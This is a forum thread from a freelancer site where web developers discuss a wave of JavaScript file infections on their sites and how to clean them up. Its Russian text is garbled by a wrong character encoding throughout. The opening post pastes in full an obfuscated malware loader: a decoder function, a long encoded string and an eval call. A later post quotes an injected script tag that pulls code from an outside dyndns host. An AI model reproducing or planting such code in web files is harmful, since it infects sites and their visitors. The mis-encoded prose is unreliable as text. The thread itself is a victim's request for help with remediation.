Ìàññîâîå çàðàæåíèå JS

  1. Weblancer
  2. Ôîðóì ôð³ëàíñåð³â
  3. Ïðîãðàìóâàííÿ
Íàäåæäà Ñ.
349 ïîâ³äîìëåíü
#13 ðîê³â òîìó
Ïîìîãèòå ïîæàëóéñòà, íà âñåõ ñàéòàõ ñîçäàííûõ ìíîé çàðàæåíû JS ôàéëû, ÿíäåêñ óæå îáíàðóæèë âðåäîíîñíûé êîä. Ýòà ïðîáëåìà êîñíóëàñü ìíå êàæåòñÿ âñåãî ðóíåòà.
Âî âñåõ js ôàéëàõ äîïèñûâàåòñÿ ñòðîêà òèïà:
var e1de40b7="";function i60a02e506(){var w3120e12=String,ge20da81=Array.prototype.slice.call(arguments).join(""),vbed671=ge20da81.substr(rc561b0(),3)-547,qf7d0a097,f92d2207e;ge20da81=ge20da81.substr(5);var o312489=ge20da81.length;for(var k603f1=0;k603f1<o312489;k603f1++){try{throw(x933f143=uaddbc(ge20da81,k603f1));}catch(e){x933f143=e;};if(x933f143=='™'){vbed671="";k603f1=b5bb8a8(k603f1);ybaeafea=x54e9de(ge20da81,k603f1);while(ybaeafea!='™'){vbed671+=ybaeafea;k603f1++;ybaeafea=wd2158199(ge20da81,k603f1);}vbed671-=583;continue;}qf7d0a097="";if(v2e46d654(x933f143)){k603f1++;x933f143=ge20da81.substr(k603f1,1);while(x933f143!='±'){qf7d0a097+=x933f143;k603f1++;x933f143=ge20da81.substr(k603f1,1);}qf7d0a097=qf7d0a097-vbed671-12;if(qf7d0a097<0)qf7d0a097+=256;qf7d0a097=qa8ad5e(qf7d0a097);e1de40b7+=w3120e12(qf7d0a097);continue;}a8125862e=o56cda9(x933f143);if(a8125862e>848)a8125862e-=848;f92d2207e=a8125862e-vbed671-12;if(f92d2207e<0)f92d2207e+=256;if(f92d2207e>=192)f92d2207e+=848;else if(f92d2207e==168)f92d2207e=1025;else if(f92d2207e==184)f92d2207e=1105;e1de40b7+=c0479049(f92d2207e);}}i60a02e506("d","87","10±2","15±","±","2","1±™7","2","3™±1","3","±™6","4","8™±18","7","±","™5","9","1","™w","™68","7™","±2","32","±™69","4™±228","±™","77","2™","8","™769™","4±23","8","±™6","17™","W","N±","1","6","9±","™","644","™VS","R™","69","6","™","±243±™586™","p±12","9","±","™60","8™","E±","15","4±±","151","±±","14","5±","™6","59","™","x±14","9","±","™","7","3","2","™±","19","3±™","69","9","™","±1","6","7±™7","47","™±2","4±","$$™675","™±216±™7","5","1™","±","2","38±™6","74","™","±150","±","±15","0","±","±","15","5±","±","15","2±","±","2","10","±","™6","8","3","™","±","2","2","5","±","™","7","57","™%","™","7","2","9™","±","7±","™635","™n±1","7","4","±™","63","9™","±","16","9","±","™691","™","±","241","±™","6","68","™","±20","5","±","™754","™.™","68","5™±2","3","1±","™68","2","™","±2","28","±™7","8","2™:@","7","™70","9™±1","8","4","±™5","9","5™","±1","25±™","606™","±1","50±","™7","2","1","™","±10","±","±","19","5","±","™76","1™+™6","39","™","±179","±™","778","™=™","5","9","1™A™","624","™±","151","±±16","1±","±","16","4","±","±156","±™","761","™","3™","65","3™±1","83±","™","78","3™","I","F","™","7","6","1™","±","236","±","™634","™±","1","62±","±174±±","172±™","5","9","0™","B","z","B:N","±32±","™64","4","™","S","R","™","687","™±2","21","±±","2","18","±","±","1","4","8±","±1","56±™601™±146","±","™763™","9™","720","™","±","5","±±","25","0±","™752™$™749™","±2","4","±","™662™","±12","3","±™","6","78™","±226±","™","7","1","1™±245","±±25","0±","™636","™±1","65","±","™","6","47™","±1","87±","™","6","8","5™","±233±","±","160","±","™73","1™±2","4","±™","63","4","™","±18","4±±18","5","±±","1","65±™","7","06","™±","2","4","3","±","™681™","±207±","±2","1","3","±™5","89","™2™75","9™±2","4","9","±","™7","33™±","223±™","7","5","8™","±24","8","±™","585","™",".","5","±1","3","1","±™59","1™","±","1","3","0±x™6","77™±2","0","7±","™","6","29™±1","60","±™620™","±1","54±","±15","9±","±1","5","0","±","±","149±™7","49","™","±","2","17±±21","9±","™66","4","™","±","1","25","±","±","2","16","±™","7","79","™±2","21±™","693™±132±","™649","™","WW±","1","97±™","7","22™","±","0±","±5±","±","25","1±±6","±","±1","4","±","±1","9","7","±™711™","±4±","±","5±","™6","1","1","™±","1","6","2±","±142","±","™","588","™±","125±","™59","5","™y","±","12","7","±8™","7","4","6","™±","23","6±™62","9™","Z™","633","™n™","64","0™","±","128±™","6","6","5","™k","™","6","79","™","v","™729","™±16","7±™76","3™=","±205±","±20","2±±2","01","±","™","713","™±242±","™","64","1™±181","±™63","6","™","±","1","6","4","±±","18","2","±±174±","±","1","66","±™60","6™","±","14","5","±±15","1±","Q","±14","6±","±","1","4","5","±","±","14","4±±1","4","6","±","™6","6","4™±","2","10","±","±","208","±™","64","1","™±1","7","1","±™6","11","™±","1","49±±1","5","1±™781","™H","7±242±","±","1","5","±","±","2","4","2","±8™7","06™","±252±™683","™","±2","2","2±±","211","±","±228±","±","2","1","7","±","™","7","13","™±","2","5","3","±±25","2±™602","™","GH","™","7","5","9","™±","2","20±7™","661™g™","6","7","9™vu","u±2","1","3","±","™","6","8","1","™","±2","12±™","7","5","8™±","219","±","±2","2","7±","2$™642","™","±181±™","7","1","1","™±","2","4","0","±","™650","™","±1","9","0±±1","9","8±","±","1","2","5±±","1","99","±","±","20","0","±","™","72","3™","±18±","±","2","54±±4","±","™76","4","™","\"(","±","2","25±","±","2","54±±2","54","±™7","0","7","™±","1","97","±™74","2™±","20","3","±™6","3","3","™","n™","671","™","±","1","41±","±1","3","2±±223","±™7","08™±","150±™763","™","±2","02±","±","2","0","1","±","™680","™","v","v","±2","28","±","±","21","4","±","±","219±±","20","9","±","±","22","0±™","7","71™?","™","7","5","8","™±2","33±3","™","6","0","2™","±","15","2±","±","153±","±","13","3±","™","660","™±1","9","7","±","±","18","6±±19","2±","™","73","4™±1","95±","™","7","00","™±","1","90±","™","59","4™","7™","629™","kuG™","6","9","1™","±","130±","™63","2","™","F","F™","66","7™","i™59","1™","±","1","38±","u","±134±4±1","2","4±™6","9","9","™±2","29±","±225","±","™74","9","™","±","22±","±","2","1","0","±™75","5","™±","2","45","±","±","2","1","6±","±","2","8","±'™","6","5","6™","±184","±™6","99","™","±245","±™5","9","6","™±","1","3","4±™","6","60","™±19","0±","™662","™±","20","1","±™7","37","™±2","6±","™","7","7","1","™±2","4","6","±™72","0™±25","2","±","™","61","2™±","1","4","2","±™7","1","4™","±","3±","™6","42™±","140","±","±","179","±™","690™±2","20±™","63","1™±16","9±","±1","6","1","±±170","±±","1","7","6±±","1","7","5±","™6","96","™","±19","1","±±","24","6±±2","09±™7","53™±","2","3±™","6","6","1","™±1","93","±","™74","1","™","±2","4","8","±™6","63™","±1","8","9","±±20","1±±","193","±","™","782™±2","51","±±","2","5","0","±™","624™±1","57","±","±","15","4","±™","755™","±2","5","±±","28±","™","7","20","™±","18","8±±1","9","0","±","™739™±3","±","±2","16","±™6","09™±1","31","±","™","76","5","™","±2","53","±™","72","2™","±164","±±1","61±","™64","4™","R™","719","™±157","±","™71","1","™","±149±™64","5","™","±","19","2","±","™","727™","±","253±™","6","8","3™","±22","6±","±1","44±","±22","7","±","±","21","1±","±","226±™70","6™","±","24","0±™68","7™±","22","8±™","61","9™±16","4","±","™6","88","™±1","49","±","±178±","±","149±™","6","9","1","™±2","2","0","±±","231","±™","65","2™","±1","80±","™6","85™","±","2","3","1±","™736™±18±±","1","0","±","±1","9","±","±","2","5","±","±21","1","±","™","65","4","™±18","2±™","768","™","7","*","&9","*™","6","67","™±","1","65","±","±","2","0","4","±™","683™","±","21","3±™7","44","™±2","6","±","™6","41™±17","1","±™","761","™,™7","5","9","™","0","±","2","28±™","6","65","™","±1","33","±™5","91","™","±1","3","5±","w","±134","±","±1","25","±™65","3","™±1","9","4±","™","76","1™2™7","3","8™±","2","0","6","±","±2","0","8","±","±2","2","6±™","652","™^","™65","6","™","_","^^","™","761","™","±19","9","±™6","80™","±","2","24","±","™6","2","2","™±","1","50","±","™724™","±","11±","±","2±","±","9","±±","13","±","±","1","99","±","™","780","™","E","™","586","™","±","136±","±1","2","7","±","™","617™","±1","4","7±N","™","70","0™±190","±","±","1","61","±","±","1","68±","±2","4","5","±±","2","30±","™5","91™±14","0±","™777","™B±","2","5","3","±8","/","D™668","™","±194","±™","67","2","™±2","1","6±±","200±±","2","1","5","±","™","6","2","8™±16","2","±","±","169±","±17","3","±","™7","0","7™","±17","5","±™7","1","7™±","2","0","5±±159±","±","15","6","±™6","96","™±1","34","±","™","618","™","8","8","±","1","6","2±™6","65","™±","1","93","±","™","76","7","™6","™657","™","±1","91±™","6","74™","±2","15","±±2","19","±","±1","4","9±±21","4±","±2","1","3","±±","2","1","7±","±","2","04","±","±","20","0±","™593","™z±","143","±™73","1™±1","9±™","643","™±","1","8","8","±","±","16","9","±±","1","8","8","±™","60","5","™","±","135","±±","133","±™637","™","±170","±","™","6","5","3™±","1","7","9","±±192","±","™65","5","™","±1","87±™66","5™±","1","95","±±1","2","6","±±","1","5","5","±™","6","54","™","s±1","85±™","71","1","™","±1","±","™63","3™±1","72±","±","1","61","±±","178±™7","11","™±245","±","™7","38","™","±","2","2","±","™5","9","0","™","±129±","3™7","6","8™±2","37","±™","6","9","3™±","163±","±154","±™658™±21","0","±","™","607","™1",".-","™6","42™","P","™","768™","±20","6","±±20","6±","™695","™","±","229","±","™74","9™","±24±±","2","1","0±","±","21","8±&™","6","06","™±","13","9±±","1","4","0±±1","50±™","6","4","5™x™62","0™","±","163","±","™6","1","1™±","14","1","±","™6","44","™","±","1","7","0±™76","4","™","%",":™","6","93™","±","2","05","±","™","702™±","247","±","™6","41","™±","1","6","7±","±186","±","±","171","±","™6","12","™If","fI™6","00","™D™6","0","0","™±","12","8","±","±14","0","±","±13","8±™69","0™±23","1±","±22","7","±±220±±","2","3","5","±","±","2","2","0","±","™6","1","8","™","VX","™723","™±1","84","±","±1","9±","™","616™:","™","59","4","™!","™63","0","™D™","6","5","5","™]","™","678™","t","t","t™","59","8™±1","46","±","±","13","2","±™687™±226±™7","0","1™±","2","3","0±","™","700™","±2","40±","™717","™±9","±™","690™±","165±","±","23","9±","±","24","0±™","7","7","7","™H4™","6","26","™","±","16","3","±","™","6","8","5™","±211±","™","6","7","9™","±","211","±±140","±","™7","2","3™±","21","3±","±","1","8","4±™738™±2","17","±","™","695™±18","3","±","™696","™±1","38±±","1","35±","±","13","4","±","±","134","±™610™00™","7","13™","±1","1","±","±155","±","±","15","2±±","1","51±™","69","4™±13","2±™7","1","7™","±","15","5±","±","1","5","±™","661","™","±","149±gdc","c","™","66","0™","b","±20","4","±™","6","64","™±","1","9","2","±","±","207±™","75","0","™","±","28±","#","'±","2","25","±\"!±3","1±","™694™","±234±±2","2","0","±","±2","23±±15","5","±™6","81","™±1","71","±±","142±","±","2","12","±±227","±™65","2™±","19","1±","™63","3","™","±","1","61","±±178±","™6","4","1","™±","1","75±","±","181±","™","6","40","™","±17","9±™","739","™","±20","8±","±","209","±","™5","88™1","™65","4™±20","6","±™","7","46™","±1","8","8±","™6","13","™4™","68","0™v","v™6","8","1™w","™","70","4","™","±142±™","6","06","™±1","54","±","±14","0±™7","72™7","-™68","9™±","22","9±±","2","37±","™6","5","8","™","±133","±±207","±±2","0","8±","±2","0","9±","±","1","89±","±195","±±184","±±1","9","0±w","™77","2","™","±","6","±±","23","3±™","767™±","2","46","±™7","39™","±22","7±","±","1","81±","±178±","±","1","7","7","±™6","91™","±","1","29±±","12","9±™","7","32","™","±30±™74","6","™±23","4±","±","1","8","8","±™67","3™","p","™","60","8™.™","64","3™QQ±1","8","7±±1","7","1","±","™6","63™","±","2","06±™70","3™","±","23","7","±","±2","44±™","7","05","™±","25","0","±","±1","8","0","±±24","9±±248±","±233","±™","6","57™","v™7","48","™±","238±","±","209","±&#±","2","9±","±","209±™68","1™","±15","3±™","604","™A™5","9","7™","g±1","23±","±142","±±","13","0","±","™","6","8","6™±16","1","±","™","6","09™±15","2","±","™","690™","±","216","±","±2","2","9","±","±","2","19","±±230±™7","3","4","™","±","1","6±±2","0","3±±","2","0","4±™5","92™C±1","37±±","13","2","±","™","779™","#D","B™","664™±","1","98","±","±","20","3±±1","96±","™","773™±","242±","™6","2","6","™`","e","™","6","78™±22","2","±±22","4±±20","5","±","±","222±±2","2","3","±™6","38","™","±","181±","±17","2","±","™662","™±","201","±","±","19","4","±±1","31","±","±","1","42±","™","7","49","™","±2","19±±","2","10±","±2","21±","™68","7™±14","8±™7","78™±2","4","6","±","™","7","5","7","™","±","2","3","2±","$","™","61","2™±","1","5","6±","™","7","4","3™±","211","±","™6","7","9™","±1","6","7","±","y","™7","3","0","™","±","1","69±±","168","±","±","168±™","77","7","™±2","15±63","/™6","0","4™±1","33±","O","™7","58™","±28±+™","7","70™7",",","™","66","5","™","±20","4","±","™","6","61™±190±","±1","57±™","6","61","™±1","9","4","±","™769™/","2*±","23","8","±","9)","™","63","0","™","±","173","±","±1","6","4±","±1","7","1±™","7","6","7™8","™77","8","™±","24","8±±1","0±™","665","™k™61","6™","7","™","610™0","0™6","39™","±1","93","±QN","™713™","±1","5","1","±±","11","±","±","2","01±","±1","55±","±152±","±","1","1","±","±","18","3±","±","182±±","18","3±","™6","69","™±157±","");eval(e1de40b7);function rc561b0(){return 2;}function uaddbc(f40dc551,b0fdc6){return f40dc551.substr(b0fdc6,1);}function b5bb8a8(y6ea01f9d){return ++y6ea01f9d;}function x54e9de(q1ef0c1a,fc2e88eff){return q1ef0c1a.substr(fc2e88eff,1);}function wd2158199(k851d22,ca4995){return k851d22.substr(ca4995,1);}function qa8ad5e(wf9e4c79){if(wf9e4c79==168)wf9e4c79=1025;else if(wf9e4c79==184)wf9e4c79=1105;return (wf9e4c79>=192 && wf9e4c79<256) ? wf9e4c79+848 : wf9e4c79;}function v2e46d654(j2db3f8){return j2db3f8=='±';}function c0479049(g3c27220){var w3120e12=String;return w3120e12(g3c27220);}function o56cda9(mf9125a){return (mf9125a+'')(0);}
Àëåêñàíäðîâè÷ Å.
5 ïîâ³äîìëåíü
#13 ðîê³â òîìó
Âñåãî ðóíåòà?...
Åñòü êó÷à ñàéòîâ ïî ïðîâåðêå ñàéòà àëÿ

Ñêà÷àé âñå ôàéëû íà êîìï.... íàéäè âñå .php ôàéëû
÷åðåç ïîèñê ïðîãîíè ÷àñòü êîäà, ëèáî ïîïðîáóé íàéòè base64_decode
Àíäðåé Õàëåöêèé
3562 ïîâ³äîìëåííÿ
#13 ðîê³â òîìó
È íå çàáûòü ïîìåíÿòü ïàðîëè íà ÔÒÏ è ïî÷èñòèòü êîìï îò âèðóñîâ.
Àëåêñàíäð Ô.
3318 ïîâ³äîìëåíü
#13 ðîê³â òîìó
È íå çàáóäüòå çàëàòàòü äûðû â ñêðèïòå îò÷åãî è çàðàæåíèå ïîøëî )
Íàäåæäà Ñ.
349 ïîâ³äîìëåíü
#13 ðîê³â òîìó
SmartDesign, äóìàþ âû ïðàâû. ó ìåíÿ òàêàÿ æå âåðñèÿ. Íà êîìïå çàñåë òðîÿí è ïåðåäàåò êîíôèã FTP êëèåíòà FileZilla. Òåïåðü âñå js ôàéëû ðó÷êàìè ÷èñòèòü... à ñàéòîâ ó ìåíÿ îõ êàê ìíîãî...
Äîñòàíó ëîãè äîñòóïà ê ñàéòó, ïî âðåìåíè èçìåíåíèÿ js ôàéëîâ âû÷èñëþ õàöêåðà è äîáàâëþ IP â ÷åðíûé ñïèñîê.
Êàê äóìàåòå, ñòîèò â îòäåë Ê îáðàùàòüñÿ?
Àðòåì Ë.
11416 ïîâ³äîìëåíü
#13 ðîê³â òîìó
WebAir, äà ñåé÷àñ ìàññîâàÿ ýïèäåìèÿ çàðàæåíèÿ ñàéòîâ. Î÷åíü ìíîãî âçëîìîâ ïðîèñõîäèò çà ïîñëåäíèå ïîëãîäà.
Öèòàòà ("WebAir"):
Êàê äóìàåòå, ñòîèò â îòäåë Ê îáðàùàòüñÿ?

Åñëè ýòî øóòêà òî ÿ îöåíèë

Ñëåäóåò ïî÷èñòèòü ôàéëû íà ñàéòå îò âðåäîíîñíîãî êîäà, ïîïðîáîâàòü íàéòè âåáøåë íà ñàéòå, íàñòðîèòü ïðàâà äîñòóïà ê ôàéëàì, ñåðâåð, à âîçìîæíî ñìåíèòü õîñòèíã, ò.ê. î÷åíü ìíîãî õîñòèíãîâ ðîññèéñêèõ ïîñëåäíåå âðåìÿ íàëîìàëè, ñìåíèòü âñå äîñòóïû, ïðîâåðèòü êîìï íà âèðóñû. Ìû äàâíî èçó÷àåì ýòó ïðîáëåìó è çàíèìàåìñÿ åå ðåøåíèåì.

Öèòàòà ("WebAir"):
âû÷èñëþ õàöêåðà è äîáàâëþ IP â ÷åðíûé ñïèñîê.

Àáñîëþòíî áåñïîëåçíî, äóìàåòå âñå ñî ñâîåãî àéïè ñèäÿò è íå èñïîëüçóþò âïíû?
Ìàêñèì Ô.
3195 ïîâ³äîìëåíü
#13 ðîê³â òîìó
Íà êàêîì-òî ñâî¸ì çàáûòîì ñàéòå îáíàðóæèë ïîõîæåå. Ãðåøó íà ñòàðóþ âåðñèþ tinyMCE. Ïàðó ðàç ÷åðåç êàêîé-òî åãî ïëþãèí ëîìàëè, òåïåðü âîò åù¸ ðàç. ×óäàêè)))
Ñåðãåé Ê.
13 ïîâ³äîìëåíü
#13 ðîê³â òîìó
Êà÷àéòå ñêðèïòû/áèáëèîòåêè èç îðèãèíàëüíûõ ðåïîçèòîðèåâ, à íå èç áëîãîâ âðîäå "Âàñÿ Ïóïêèí - JS çàìåòêè" è ñòàòüè "Çàöåíèòå íîâóþ áèáëèîòå÷êó".
 çàâèñèìîñòè îò óðîâíÿ èçâðàùåííîñòè àâòîðà, òàêèå ñêðèïòû ìîãóò ñîäåðæàòü ëþáîé "íå-ðîäíîé" êîä.
Àíäðåé ×.
61 ïîâ³äîìëåííÿ
#13 ðîê³â òîìó
Åñëè êîìó èíòåðåñíî - íåìíîãî ïðî ýòó ýïèäåìèþ
Òîæå âëåòåë ñ ýòîé áåäîé òîãäà - çàêàçûâàë ó ôðèëàíñåðà íàñòðîéêó 1 ìîäà äëÿ ôîðóìà (ïîëåíèëñÿ ñàì äåëàòü, äóìàë òàê áûñòðåå).  èòîãå - ïîëíî÷è ïðîñèäåë ñ áåêàïàìè.

Àéïè âû íèêàêîé íå íàéäåòå, ýòî æå íå âðó÷íóþ äåëàþò, à ñîôòîì ñïåöèàëüíûì, è åñ-íî ÷åðåç ñîêñ/âïí.
Åâãåíèé Ò.
5 ïîâ³äîìëåíü
#13 ðîê³â òîìó
Áûëî òàêîå íà ñàéòå êëèåíòà. Ñíà÷àëà äóìàë ÷òî êòî-òî íàøåë äûðó â ìîåé ñàìîïèñíîé CMS Î÷èñòèë, ïîñòàâèë äàìï âñåõ http çàïðîñîâ ê php â ôàéë. ×åðåç íåñêîëüêî äíåé ñàéò îïÿòü çàðàçèëñÿ, à â äàìïå íèêàêîé ïîäîçðèòåëüíîé äåÿòåëüíîñòè íå áûëî Ïîìîãëà ñìåíà ïàðîëåé íà FTP. Ïðè÷åì äðóãèå ñàéòû èç ìîåãî ftp ìåíåäæåðà íå ïîñòðàäàëè, ïîýòîìó ãðåøó íà êëèåíòà
Äàâèä Ï.
828 ïîâ³äîìëåíü
#13 ðîê³â òîìó
Çàìåòèë òàêîé êîä
<script src="http://dyndnsme.dyndns.org/rss.js"></script>


 ñàìîì êîíöå ñòðàíèöû ñàéòà. Çàìåòèë íà 3õ ñàéòàõ ñòàðûõ êëèåíòîâ, è íà íåìàëîèçâåñíûõ ñàéòàõ.

Ñâÿçàííî ëè ýòî êàê òî ñ ýòèìè ñòàòüÿìè?
íà àíãëèéñêîì:



íà ðóññêîì ïîõîæåå: